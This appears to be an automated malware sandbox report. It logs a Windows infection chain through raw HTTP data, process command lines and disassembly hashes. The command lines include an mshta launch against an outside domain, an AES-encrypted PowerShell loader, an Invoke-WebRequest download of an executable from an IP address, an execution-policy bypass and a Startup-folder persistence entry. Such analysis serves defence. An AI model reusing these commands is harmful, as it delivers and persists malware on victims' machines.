                                                                                        2024-12-18 19:55:26 UTC16384INData Raw: 2c 6c 48 2c 48 54 2c 61 4e 2c 6f 48 2c 6c 48 2c 74 43 2c 74 43 2c 6f 48 2c 6c 48 2c 48 54 2c 74 6d 2c 6f 48 2c 6c 48 2c 74 43 2c 69 44 2c 6f 48 2c 6c 48 2c 74 43 2c 48 54 2c 6f 48 2c 6c 48 2c 48 54 2c 74 6d 2c 6f 48 2c 6c 48 2c 74 43 2c 6c 48 2c 6f 48 2c 6c 48 2c 74 43 2c 58 67 2c 6f 48 2c 6c 48 2c 74 43 2c 58 67 2c 6f 48 2c 6c 48 2c 48 54 2c 6c 48 2c 6f 48 2c 6c 48 2c 74 43 2c 4f 48 2c 6f 48 2c 6c 48 2c 74 43 2c 4f 48 2c 6f 48 2c 6c 48 2c 74 43 2c 74 43 2c 6f 48 2c 6c 48 2c 48 54 2c 62 54 2c 6f 48 2c 6c 48 2c 58 67 2c 74 6d 2c 6f 48 2c 6c 48 2c 74 43 2c 4f 48 2c 6f 48 2c 6c 48 2c 74 43 2c 48 54 2c 6f 48 2c 6c 48 2c 48 54 2c 74 6d 2c 6f 48 2c 6c 48 2c 48 54 2c 74 6d 2c 6f 48 2c 6c 48 2c 74 43 2c 4f 48 2c 6f 48 2c 6c 48 2c 58 67 2c 62 54 2c 6f 48 2c 6c 48
                                                                                        Data Ascii: ,lH,HT,aN,oH,lH,tC,tC,oH,lH,HT,tm,oH,lH,tC,iD,oH,lH,tC,HT,oH,lH,HT,tm,oH,lH,tC,lH,oH,lH,tC,Xg,oH,lH,tC,Xg,oH,lH,HT,lH,oH,lH,tC,OH,oH,lH,tC,OH,oH,lH,tC,tC,oH,lH,HT,bT,oH,lH,Xg,tm,oH,lH,tC,OH,oH,lH,tC,HT,oH,lH,HT,tm,oH,lH,HT,tm,oH,lH,tC,OH,oH,lH,Xg,bT,oH,lH
                                                                                        2024-12-18 19:55:26 UTC11073INData Raw: 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 ae 00 20 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 ae 00 20 00 4f 00 70 00 65 00 72 00 61 00 74 00 69 00 6e 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6d 00 00 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 31 00 30 00 2e 00 30 00 2e 00 31 00 39 00 30 00 34 00 31 00 2e 00 31 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6e 00 73 00 6c 00 61 00 74 00 69 00 6f 00 6e 00 00 00 00 00 09 04 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: oductNameMicrosoft Windows Operating System>ProductVersion10.0.19041.1DVarFileInfo$Translation


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:14:55:19
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
                                                                                        Imagebase:0x7ff709670000
                                                                                        File size:52'224 bytes
                                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:14:55:19
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:14:55:19
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:. \*i*\*2\msh*e https://tiffany-careers.com/duydemo
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:14:55:22
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo
                                                                                        Imagebase:0x7ff72e390000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:14:55:25
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:14:55:27
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean('00952E0EAAA369CB7EDA094FDAAD548DC7EBBE105E37D3A4DD5A7D2DC3C7BDB28C06949289913AE18AFF4985AC0A4A425F444A5427F4855F02DC192D92C9D059910F5326B551C1FBE3BD556C61D517FD26BB0DDA113550D575D28F8A6103693337BF9498AB6F862E4DA5E000AA791D9AA38BFFDF638AEFEB44FA353B1BBC79C0B8F3F039BBFB473DBE5A2163C5297FEA3B449744B787BFD5E3D2D2DC793FA3D42573446DB8C1522E13A7696F37E5C6DFB4339D6F312DA4F7AC3F7F8A272A1C7E6D46C705DC9106ADB9D2690AD45F178F68F3F96535F494B1C112A90293671FCF3A99B408B224F36FEDB31BC4BE9660AB3338DC0571CC95E4819A641F1E63F34EEA383DA81507A9460D2F793F27C40F0BE3CDC495923F94F572D7CC36F0F9BC192B64FFF1EA68FF6DF1267E85703F7CE3A1B2B369CB69B382FA5E5414694A7FAC82DB7EF1CD63E7D0DB286788C22BE423741CE14EED86328E5B0A1B5E6015C081B9ADC5584B188904C72FB7809947462ABB46B4411C8F7467776C4CF5E6DE4A125B51E141F5F377DC69A3A551F363C5B92C853BD07B17D6A6D22B1BB2125B1DAA5AEB4779F820FD87D3A473D74F813C3D317EDD4CA7364858BE4EF1A199CF0CCE68623CFCC2DAE619884748B0669842ADD109C7C2D3C94C5E60D3734508294BF013972C272FD970EC7823EEF4EC60519B53B7CB23D4B5AB2A35FFDA992A39E95A2EA920D0A343160707DD5A2D29AE6EF568D25D354BAD060EEB2312EFC70E382228038F6E3AAFBE6DA3F033EC03FCFAC2E6474AA92901C29C7E935F0EF9256603E50E9AE54F28C64EB0B62541C16C81B31F123EB1F62AA075030DF335F2F233B1D0572DB1344253CB16FC57D50EA0FEC5F117610698B3981E1FE1037593D2F25954CEB7AA7476166501E6E91201EA06DCEA504BF1755984B1EB672A8368994F7FC4C67586ED78251A2F06F39283D3DE14A0B398BD25B7578AD0901A36303C6EEAE780BD3A96D106C54D28D9174422CFC0C12EED237BB3D9D8B8C0BEF9DE95A209C8CC66E2B538F79DDAF3183835A0F7F6694A40776335E75BDECD48A839EC0682B59CFA1D33BB11A349DDBB588B3F645CB31E55E0AB2543363E815610EB013DEB7CE8EC26A913B7BEF508C1825E8C10EB3320C2D1CE31D968F2E47C293CD02C39B499523127D609CCD06DC157D6D2B498A34CF14B0E20BF6BC402B4A171A623AF24253354BF256B06B278DBBE05F05B405CAA69A5B27D9635119927475C932D7E26F612B9A6119E0DA2D95273F043B8BF88A54B8C708E55E08264CBA9B31BE5DF8578C4F53770C16C752FFC20FF1177103B4E88CB671AD1E8922D66CED32F4A427EA0E9009B24EE692A0DF6E540DDA0214C6CED115113D1DE60DB67E356E2FA9994FEE2C1D1BB4C9EFCC878383644915EAE6C54AB94C50C12CF86B0105A8EF91D6ABC4C61CDFB58006AC5F6D6B39AB88817B83AB53CE4965B39228AF37E6A49E5392F23C9553BCF4075260DF9B4FE20DB589FB4EA5567B6AE3A73FA2FA7C96B3C25C044D663A965CC679968E22349FD362344D3981B8482F16667D5829063A00F894C03FC9CC5753DD640CC66AB7B73D992518CF818B20CE25E63E80DE29C8CB1804C28C38743BBA0ABCEE4631FB8ECE9886E143AC598E0CFF0E0EDF7EB943C8A');$fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3)
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:14:55:28
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:14:55:33
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf"
                                                                                        Imagebase:0x7ff702560000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:14:55:35
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff6c3ff0000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:14:55:35
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1652,i,1199563268995675022,292876181194953866,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff6c3ff0000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:14:55:37
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\BFmcYQ.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\BFmcYQ.exe"
                                                                                        Imagebase:0x7ff74d030000
                                                                                        File size:1'083'904 bytes
                                                                                        MD5 hash:085AE742872C761A3485E075756E4781
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 33%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:14:55:37
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe""
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:14:55:37
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:14:55:46
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                                                        Imagebase:0x7ff741d30000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:14:55:46
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:14:55:52
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Users\Public\Guard.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                                                        Imagebase:0xa20000
                                                                                        File size:893'608 bytes
                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 8%, ReversingLabs
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:14:55:55
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                                                        Imagebase:0x410000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:23
                                                                                        Start time:14:55:55
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:14:56:06
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                                                        Imagebase:0x7ff6779f0000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:27
                                                                                        Start time:14:56:10
                                                                                        Start date:18/12/2024
                                                                                        Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                                                        Imagebase:0xf10000
                                                                                        File size:893'608 bytes
                                                                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 8%, ReversingLabs
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 000002CACFB00FB1 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000003.1706091464.000002CACFB00000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002CACFB00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_3_2cacfb00000_mshta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                          • Instruction ID: 3a344d0055faae3049a0386911256db4aa4b1d7e1e3b1f68bd6aa312b4804460
                                                                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                          • Instruction Fuzzy Hash: 5790024449944A59E41411910C4965C50416398194FD48482441690144D94E03962153
                                                                                          Function 000002CACFB00FB9 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000003.1706091464.000002CACFB00000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002CACFB00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_3_2cacfb00000_mshta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                          • Instruction ID: 3a344d0055faae3049a0386911256db4aa4b1d7e1e3b1f68bd6aa312b4804460
                                                                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                          • Instruction Fuzzy Hash: 5790024449944A59E41411910C4965C50416398194FD48482441690144D94E03962153
                                                                                          Function 000002CACFB00FA9 Relevance: .0, Instructions: 5COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000003.1706091464.000002CACFB00000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002CACFB00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_3_2cacfb00000_mshta.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                          • Instruction ID: 3a344d0055faae3049a0386911256db4aa4b1d7e1e3b1f68bd6aa312b4804460
                                                                                          • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                          • Instruction Fuzzy Hash: 5790024449944A59E41411910C4965C50416398194FD48482441690144D94E03962153

                                                                                          Executed Functions

                                                                                          Function 00007FFAAB0C80C3 Relevance: .7, Instructions: 727COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699311315.00007FFAAB0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab0c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6574f46b4c982baf2d0a73594dec041df80012a7d964853e2355b996c7b9721e
                                                                                          • Instruction ID: 410abb7999dd08bab220575bca6f5f144b763451661dde702987cf87e5e7c049
                                                                                          • Opcode Fuzzy Hash: 6574f46b4c982baf2d0a73594dec041df80012a7d964853e2355b996c7b9721e
                                                                                          • Instruction Fuzzy Hash: F8F1C231A08A498FDB85EF58C445ABA7BE1FF5A350F14416AD40DD72A6CB34E885CBC1
                                                                                          Function 00007FFAAB0C4DFD Relevance: .5, Instructions: 528COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699311315.00007FFAAB0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab0c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e331e6321117baee0000493f558ddb30cce2e30e7e3ab03fc3e51f8f0d4b86d
                                                                                          • Instruction ID: f8f5ba78ae44884f5ecc9296d5ebc1168681a039d5aa8b6d3160a0cb34816e27
                                                                                          • Opcode Fuzzy Hash: 0e331e6321117baee0000493f558ddb30cce2e30e7e3ab03fc3e51f8f0d4b86d
                                                                                          • Instruction Fuzzy Hash: 21020371A09A498FDB85DB6CC495AE97BF1FF6A341F1441BAD00DC72A6CB24E845CBC0
                                                                                          Function 00007FFAAB0C66D3 Relevance: .5, Instructions: 486COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699311315.00007FFAAB0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab0c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e579b22101015bbe8c7ea46505788f9a4892a23f24e07feda6b911527ac8907
                                                                                          • Instruction ID: 6531a74f2c1d9edc5b7e3cb4edf996f80825efe9d8d64b9c6af382e22cbe354c
                                                                                          • Opcode Fuzzy Hash: 7e579b22101015bbe8c7ea46505788f9a4892a23f24e07feda6b911527ac8907
                                                                                          • Instruction Fuzzy Hash: 81E1B231A08A4D8FDB99EF5CC455AE97BE1FF5A340F1482A9D40DC7256CA24E886CBC0
                                                                                          Function 00007FFAAB1944CE Relevance: .2, Instructions: 224COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699862592.00007FFAAB190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab190000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 027cfb6c30a21ee0ee64a70d9680a6a6ad31ebfa0052de29d14492b5fdaea6f6
                                                                                          • Instruction ID: fbe67648ae33f93846c41e30549f69b234564a43d9d825f0d887cb1c1c724a2c
                                                                                          • Opcode Fuzzy Hash: 027cfb6c30a21ee0ee64a70d9680a6a6ad31ebfa0052de29d14492b5fdaea6f6
                                                                                          • Instruction Fuzzy Hash: AC61F8A3B1FE864FF7BA976848116B566D1EF872A474841BAD04EC31E3ED099C0982C1
                                                                                          Function 00007FFAAB193451 Relevance: .2, Instructions: 203COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699862592.00007FFAAB190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab190000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c4943a6155c0c59931a1ae8bcb048cf33aefb288e54a56784ec077f51f958daf
                                                                                          • Instruction ID: 57a6d25e2adcb987430ed5e5505db77533fd0151fc8e5a733c194d0d39bb1974
                                                                                          • Opcode Fuzzy Hash: c4943a6155c0c59931a1ae8bcb048cf33aefb288e54a56784ec077f51f958daf
                                                                                          • Instruction Fuzzy Hash: F5510692A0EBC64FE397876868551747BD1FF9B29470981FBD04DC72E3E81E5C0A8391
                                                                                          Function 00007FFAAB19451A Relevance: .1, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699862592.00007FFAAB190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab190000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 02fff4881f60be8de14d9c8783a03c3e05051e1b6771db68bda9a27e3e8ed400
                                                                                          • Instruction ID: 636571d0d888ff02f40a4619228937492fe6e6805b193b80763d8277d64bfcff
                                                                                          • Opcode Fuzzy Hash: 02fff4881f60be8de14d9c8783a03c3e05051e1b6771db68bda9a27e3e8ed400
                                                                                          • Instruction Fuzzy Hash: 4F41D593F1FAC78FF7AA9368485127466C2EF872A578841BAD40DC31E2DC0D9C0942C1
                                                                                          Function 00007FFAAB194C36 Relevance: .1, Instructions: 81COMMON
                                                                                          Download Yara Rule
